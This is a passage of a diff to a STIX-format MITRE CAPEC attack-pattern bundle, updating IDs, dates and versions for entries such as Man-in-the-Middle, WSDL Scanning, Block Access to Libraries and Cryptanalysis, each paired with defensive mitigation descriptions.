"course-of-action--07c1f1b1-4d7e-47e9-84dc-7fa4fad4772d", "relationship_type": "mitigates", - "target_ref": "attack-pattern--7f9218de-7dcc-49fa-ae32-0f2fd51834e8" + "target_ref": "attack-pattern--e4a2e6c2-39c4-4441-9343-bae3b026ccd4" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-93-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Use static analysis tools to identify log forging vulnerabilities.", "type": "course-of-action", - "id": "course-of-action--afb8ae6e-18d2-4c5c-a044-e020d9a6d4dd" + "id": "course-of-action--c82b2ed1-695e-478b-a652-8378b54533ea" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--50095427-58e7-47f6-a4e1-3b2b8b922834", - "source_ref": "course-of-action--afb8ae6e-18d2-4c5c-a044-e020d9a6d4dd", + "id": "relationship--fb58982e-6527-4113-bd7c-61aa753ad5b1", + "source_ref": "course-of-action--c82b2ed1-695e-478b-a652-8378b54533ea", "relationship_type": "mitigates", - "target_ref": "attack-pattern--7f9218de-7dcc-49fa-ae32-0f2fd51834e8" + "target_ref": "attack-pattern--e4a2e6c2-39c4-4441-9343-bae3b026ccd4" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-93-4", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Avoid viewing logs with tools that may interpret control characters in the file, such as command-line shells.", "type": "course-of-action", - "id": "course-of-action--db07e64c-9523-41d1-a6c0-380dd41e1c64" + "id": "course-of-action--cf93531f-4e41-46e6-83f2-47dece8e630f" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--55fa232a-8133-42fc-8397-1ccf628e84f7", - "source_ref": "course-of-action--db07e64c-9523-41d1-a6c0-380dd41e1c64", + "id": "relationship--36bfdede-befc-4cec-ada6-f0a1c5de2e01", + "source_ref": "course-of-action--cf93531f-4e41-46e6-83f2-47dece8e630f", "relationship_type": "mitigates", - "target_ref": "attack-pattern--7f9218de-7dcc-49fa-ae32-0f2fd51834e8" + "target_ref": "attack-pattern--e4a2e6c2-39c4-4441-9343-bae3b026ccd4" }, { "name": "Man in the Middle Attack", - "description": "This type of attack targets the communication between two components (typically client and server). The attacker places himself in the communication channel between the two components. Whenever one component attempts to communicate with the other (data flow, authentication challenges, etc.), the data first goes to the attacker, who has the opportunity to observe or alter it, and it is then passed on to the other component as if it was never intercepted. This interposition is transparent leaving the two compromised components unaware of the potential corruption or leakage of their communications. The potential for Man-in-the-Middle attacks yields an implicit lack of trust in communication or identify between two components.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "description": "This type of attack targets the communication between two components (typically client and server). The attacker places himself in the communication channel between the two components. Whenever one component attempts to communicate with the other (data flow, authentication challenges, etc.), the data first goes to the attacker, who has the opportunity to observe or alter it, and it is then passed on to the other component as if it was never observed. This interposition is transparent leaving the two compromised components unaware of the potential corruption or leakage of their communications. The potential for Man-in-the-Middle attacks yields an implicit lack of trust in communication or identify between two components. MITM attacks differ from sniffing attacks since they often modify the communications prior to delivering it to the intended recipient. These attacks also differ from interception attacks since they may forward the sender's original unmodified data, after copying it, instead of keeping it for themselves.", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -45788,120 +46517,121 @@ "Gain Privileges" ] }, - "x_capec_abstraction": "Standard", + "x_capec_abstraction": "Meta", "x_capec_example_instances": [ "\n Leveraging security vulnerabilities and inherent functionality within web browsers, an adversary may be able to execute a \"Man in the Browser\" (MITB) attack. The initial compromise of this attack is generally a Trojan delivered to a victim's system via phishing attacks, drive-by malware installations, or malicious browser extensions. Once the Trojan is on the victim system, the adversary can observe and intercept traffic such as cookies, HTTP sessions, and SSL client certificate, which may allow for browser pivoting into an authenticated session. MITB attacks also circumvent common security mechanisms such as two and three factor authentication, as well as SSL/PKI.\n For example, after installing a Trojan, an adversary positions himself between the victim and their banking institution. The victim begins by initiating a funds transfer from their personal savings to their personal checking account. Using injected JavaScript, the adversary captures this request and modifies it to transfer an increased amount of funds to an account that he controls, before sending it to the bank. The bank processes the transfer and sends the confirmation notice back to the victim, which is instead intercepted by the adversary. The adversary modifies the confirmation to reflect the original transaction details and sends this modified message back to the victim. Upon receiving the confirmation, the victim assumes the transfer was successful and is unaware that their money has just been transferred to the adversary.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--9ab9431d-b8bd-4689-93fa-271a2f8b1d5b" + "id": "attack-pattern--81cb8af7-a9ff-4c4d-822c-c74a618da6ad" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-94-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Get your Public Key signed by a Certificate Authority", "type": "course-of-action", - "id": "course-of-action--b1dce943-e060-44e0-b078-1ec7699c2e9c" + "id": "course-of-action--77f86884-ad34-47be-ade7-4900af686435" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--1c7010b5-b368-4bd2-a289-0172bffda229", - "source_ref": "course-of-action--b1dce943-e060-44e0-b078-1ec7699c2e9c", + "id": "relationship--c4a3ee46-a116-4224-a073-e75de578148d", + "source_ref": "course-of-action--77f86884-ad34-47be-ade7-4900af686435", "relationship_type": "mitigates", - "target_ref": "attack-pattern--9ab9431d-b8bd-4689-93fa-271a2f8b1d5b" + "target_ref": "attack-pattern--81cb8af7-a9ff-4c4d-822c-c74a618da6ad" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-94-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Encrypt your communication using cryptography (SSL,...)", "type": "course-of-action", - "id": "course-of-action--eeb98b99-0151-4db4-9759-c96a826f3009" + "id": "course-of-action--0e44c49a-a553-4aaf-81b5-3a5d77a541e7" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--062f822e-041a-4022-b78a-c91cf2e31f24", - "source_ref": "course-of-action--eeb98b99-0151-4db4-9759-c96a826f3009", + "id": "relationship--b7a2284e-2098-4d9c-9fd2-051cb7581e03", + "source_ref": "course-of-action--0e44c49a-a553-4aaf-81b5-3a5d77a541e7", "relationship_type": "mitigates", - "target_ref": "attack-pattern--9ab9431d-b8bd-4689-93fa-271a2f8b1d5b" + "target_ref": "attack-pattern--81cb8af7-a9ff-4c4d-822c-c74a618da6ad" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-94-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Use Strong mutual authentication to always fully authenticate both ends of any communications channel.", "type": "course-of-action", - "id": "course-of-action--dbd797f9-6445-4345-a4b2-48ff19720051" + "id": "course-of-action--55337545-1e96-4f8c-b0e5-181084b3a3e8" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--79dd917f-05c4-41ab-9d2e-cdbfbb85fd0d", - "source_ref": "course-of-action--dbd797f9-6445-4345-a4b2-48ff19720051", + "id": "relationship--c87904c0-cfe0-43b2-8962-79660b813dbd", + "source_ref": "course-of-action--55337545-1e96-4f8c-b0e5-181084b3a3e8", "relationship_type": "mitigates", - "target_ref": "attack-pattern--9ab9431d-b8bd-4689-93fa-271a2f8b1d5b" + "target_ref": "attack-pattern--81cb8af7-a9ff-4c4d-822c-c74a618da6ad" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-94-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Exchange public keys using a secure channel", "type": "course-of-action", - "id": "course-of-action--78973b68-b25c-470f-b16c-4aceaed43c2a" + "id": "course-of-action--3cf0b29a-1708-4c94-996e-8606b5832e54" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--b9a9dcae-27c0-4a82-bbdf-69490fbd437a", - "source_ref": "course-of-action--78973b68-b25c-470f-b16c-4aceaed43c2a", + "id": "relationship--00738791-5997-44f1-b35a-6b2ff5bbdeb2", + "source_ref": "course-of-action--3cf0b29a-1708-4c94-996e-8606b5832e54", "relationship_type": "mitigates", - "target_ref": "attack-pattern--9ab9431d-b8bd-4689-93fa-271a2f8b1d5b" + "target_ref": "attack-pattern--81cb8af7-a9ff-4c4d-822c-c74a618da6ad" }, { "name": "WSDL Scanning", "description": "This attack targets the WSDL interface made available by a web service. The attacker may scan the WSDL interface to reveal sensitive information about invocation patterns, underlying technology implementations and associated vulnerabilities. This type of probing is carried out to perform more serious attacks (e.g. parameter tampering, malicious content injection, command injection, etc.). WSDL files provide detailed information about the services ports and bindings available to consumers. For instance, the attacker can submit special characters or malicious content to the Web service and can cause a denial of service condition or illegal access to database records. In addition, the attacker may try to guess other private methods by using the information provided in the WSDL files.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -45950,143 +46680,144 @@ "\n The Web Services Description Language (WSDL) allows a web service to advertise its capabilities by describing operations and parameters needed to access the service. As discussed in step 5 of this series, WSDL is often generated automatically, using utilities such as Java2WSDL, which takes a class or interface and builds a WSDL file in which interface methods are exposed as web services.\n Because WSDL generation often is automated, enterprising adversaries can use WSDL to gain insight into the both public and private services. For example, an organization converting legacy application functionality to a web services framework may inadvertently pass interfaces not intended for public consumption to a WSDL generation tool. The result will be SOAP interfaces that give access to private methods.\n Another, more subtle WSDL attack occurs when an enterprising attacker uses naming conventions to guess the names of unpublished methods that may be available on the server. For example, a service that offers a stock quote and trading service may publish query methods such as requestStockQuote in its WSDL. However, similar unpublished methods may be available on the server but not listed in the WSDL, such as executeStockQuote. A persistent adversary with time and a library of words and phrases can cycle thru common naming conventions (get, set, update, modify, and so on) to discover unpublished application programming interfaces that open doors into private data and functionality.\n Source : \"Seven Steps to XML Mastery, Step 7: Ensure XML Security\", Frank Coyle. See reference section.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--4dd5b467-2e72-47d9-93bc-3585d1887c6d" + "id": "attack-pattern--072159ee-a734-4aec-8162-f36adbfb2f71" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-95-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "It is important to protect WSDL file or provide limited access to it.", "type": "course-of-action", - "id": "course-of-action--70227abb-a780-455d-ae45-8d86d7338474" + "id": "course-of-action--1950e4b9-d4fc-491a-a4cd-040c485933bf" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--deeb06b1-35a3-4ff6-b3ba-e41af0b79752", - "source_ref": "course-of-action--70227abb-a780-455d-ae45-8d86d7338474", + "id": "relationship--a5cd32a1-ba17-4566-8c53-384cfcfd19bd", + "source_ref": "course-of-action--1950e4b9-d4fc-491a-a4cd-040c485933bf", "relationship_type": "mitigates", - "target_ref": "attack-pattern--4dd5b467-2e72-47d9-93bc-3585d1887c6d" + "target_ref": "attack-pattern--072159ee-a734-4aec-8162-f36adbfb2f71" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-95-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Review the functions exposed by the WSDL interface (especially if you have used a tool to generate it). Make sure that none of them is vulnerable to injection.", "type": "course-of-action", - "id": "course-of-action--d898b205-59a0-49fa-b317-9032bb2ed35e" + "id": "course-of-action--bce5f53e-f172-44e5-9663-605f8f248104" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--787fa48a-5e35-4960-819d-98351fae71ec", - "source_ref": "course-of-action--d898b205-59a0-49fa-b317-9032bb2ed35e", + "id": "relationship--68b09834-18ce-46ff-9558-82361f5da99c", + "source_ref": "course-of-action--bce5f53e-f172-44e5-9663-605f8f248104", "relationship_type": "mitigates", - "target_ref": "attack-pattern--4dd5b467-2e72-47d9-93bc-3585d1887c6d" + "target_ref": "attack-pattern--072159ee-a734-4aec-8162-f36adbfb2f71" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-95-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Ensure the WSDL does not expose functions and APIs that were not intended to be exposed.", "type": "course-of-action", - "id": "course-of-action--ad51bfe7-3984-425a-8611-efb67d6000a4" + "id": "course-of-action--b70cdf96-4742-48b1-a3d9-1754ddb54109" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--15a056fb-51a1-4a9d-90b3-4cf77ba345e6", - "source_ref": "course-of-action--ad51bfe7-3984-425a-8611-efb67d6000a4", + "id": "relationship--15e58cc3-2891-4af9-9ce2-a95c7971e74b", + "source_ref": "course-of-action--b70cdf96-4742-48b1-a3d9-1754ddb54109", "relationship_type": "mitigates", - "target_ref": "attack-pattern--4dd5b467-2e72-47d9-93bc-3585d1887c6d" + "target_ref": "attack-pattern--072159ee-a734-4aec-8162-f36adbfb2f71" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-95-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Pay attention to the function naming convention (within the WSDL interface). Easy to guess function name may be an entry point for attack.", "type": "course-of-action", - "id": "course-of-action--8d24da15-d7d5-48f4-a060-62d1d31e5de5" + "id": "course-of-action--0e2f45e3-d988-4da1-a19f-202c51c40a0f" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--520d97be-72e2-4843-a59f-7c6ea00466c4", - "source_ref": "course-of-action--8d24da15-d7d5-48f4-a060-62d1d31e5de5", + "id": "relationship--3c6dba09-e75d-4a64-8220-7d71fbb3ca03", + "source_ref": "course-of-action--0e2f45e3-d988-4da1-a19f-202c51c40a0f", "relationship_type": "mitigates", - "target_ref": "attack-pattern--4dd5b467-2e72-47d9-93bc-3585d1887c6d" + "target_ref": "attack-pattern--072159ee-a734-4aec-8162-f36adbfb2f71" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-95-4", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Validate the received messages against the WSDL Schema. Incomplete solution.", "type": "course-of-action", - "id": "course-of-action--6640e37c-ba2e-42c1-aa66-54100adee6b9" + "id": "course-of-action--72dd2acb-8073-41ff-96fb-770cfa9e5583" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--98c377c6-9559-4e62-8da4-4b671b704841", - "source_ref": "course-of-action--6640e37c-ba2e-42c1-aa66-54100adee6b9", + "id": "relationship--43c01944-e35a-4933-8afc-2611060ce775", + "source_ref": "course-of-action--72dd2acb-8073-41ff-96fb-770cfa9e5583", "relationship_type": "mitigates", - "target_ref": "attack-pattern--4dd5b467-2e72-47d9-93bc-3585d1887c6d" + "target_ref": "attack-pattern--072159ee-a734-4aec-8162-f36adbfb2f71" }, { "name": "Block Access to Libraries", "description": "An application typically makes calls to functions that are a part of libraries external to the application. These libraries may be part of the operating system or they may be third party libraries. It is possible that the application does not handle situations properly where access to these libraries has been blocked. Depending on the error handling within the application, blocked access to libraries may leave the system in an insecure state that could be leveraged by an attacker.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -46133,40 +46864,41 @@ "A web-based system uses a third party cryptographic random number generation library that derives entropy from machine's hardware. This library is used in generation of user session ids used by the application. If the library is inaccessible, the application instead uses a software based weak pseudo random number generation library. An attacker of the system blocks access of the application to the third party cryptographic random number generation library (by renaming it). The application in turn uses the weak pseudo random number generation library to generate session ids that are predictable. An attacker then leverages this weakness to guess a session id of another user to perform a horizontal elevation of privilege escalation and gain access to another user's account." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--e4875987-30bf-47af-899f-b337c991c93c" + "id": "attack-pattern--c87d3ca8-4b1a-4711-a2b9-07f413c986ef" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-96-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Ensure that application handles situations where access to APIs in external libraries is not available securely. If the application cannot continue its execution safely it should fail in a consistent and secure fashion.", "type": "course-of-action", - "id": "course-of-action--327ef3eb-61f9-400f-8239-96abc5161993" + "id": "course-of-action--3463f037-c2bb-4801-a794-50ad603d3a5b" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--dd391747-a7ef-4bc2-85af-a79d4fa2ffbd", - "source_ref": "course-of-action--327ef3eb-61f9-400f-8239-96abc5161993", + "id": "relationship--bd42a550-a4da-4086-a5c8-c1e27cb48ac0", + "source_ref": "course-of-action--3463f037-c2bb-4801-a794-50ad603d3a5b", "relationship_type": "mitigates", - "target_ref": "attack-pattern--e4875987-30bf-47af-899f-b337c991c93c" + "target_ref": "attack-pattern--c87d3ca8-4b1a-4711-a2b9-07f413c986ef" }, { "name": "Cryptanalysis", "description": "Cryptanalysis is a process of finding weaknesses in cryptographic algorithms and using these weaknesses to decipher the ciphertext without knowing the secret key (instance deduction). Sometimes the weakness is not in the cryptographic algorithm itself, but rather in how it is applied that makes cryptanalysis successful. An attacker may have other goals as well, such as: Total Break (finding the secret key), Global Deduction (finding a functionally equivalent algorithm for encryption and decryption that does not require knowledge of the secret key), Information Deduction (gaining some information about plaintexts or ciphertexts that was not previously known) and Distinguishing Algorithm (the attacker has the ability to distinguish the output of the encryption (ciphertext) from a random permutation of bits).", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -46212,65 +46944,66 @@ "A very easy to understand example is a cryptanalysis technique called frequency analysis that can be successfully applied to the very basic classic encryption algorithms that performed mono-alphabetic substitution replacing each letter in the plaintext with its predetermined mapping letter from the same alphabet. This was considered an improvement over a more basic technique that would simply shift all of the letters of the plaintext by some constant number of positions and replace the original letters with the new letter with the resultant alphabet position. While mono-alphabetic substitution ciphers are resilient to blind brute force, they can be broken easily with nothing more than a pen and paper. Frequency analysis uses the fact that natural language is not random and mono-alphabetic substitution does not hide the statistical properties of the natural language. So if the letter \"E\" in an English language occurs with a certain known frequency (about 12.7%), whatever \"E\" was substituted with to get to the ciphertext, will occur with the similar frequency. Having this frequency information allows the cryptanalyst to quickly determine the substitutions and decipher the ciphertext. Frequency analysis techniques are not applicable to modern ciphers as they are all resilient to it (unless this is a very bad case of a homegrown encryption algorithm). This example is inapplicable to modern cryptographic ciphers but is here to illustrate a rudimentary example of cryptanalysis." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--e85823f0-23de-409f-a629-8138dad396d7" + "id": "attack-pattern--8767e72d-72a4-42d9-a7ec-c03a0776ab7d" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-97-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Use proven cryptographic algorithms with recommended key sizes.", "type": "course-of-action", - "id": "course-of-action--7b805a93-f5fe-4611-9561-5851c725cd88" + "id": "course-of-action--edc6170e-39db-4bd7-8fe9-bcd69b301007" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--e5591ecb-af31-47de-800e-33ff549c2d59", - "source_ref": "course-of-action--7b805a93-f5fe-4611-9561-5851c725cd88", + "id": "relationship--3e962b00-a7d0-42bc-81b7-8c1c8f2a7e4f", + "source_ref": "course-of-action--edc6170e-39db-4bd7-8fe9-bcd69b301007", "relationship_type": "mitigates", - "target_ref": "attack-pattern--e85823f0-23de-409f-a629-8138dad396d7" + "target_ref": 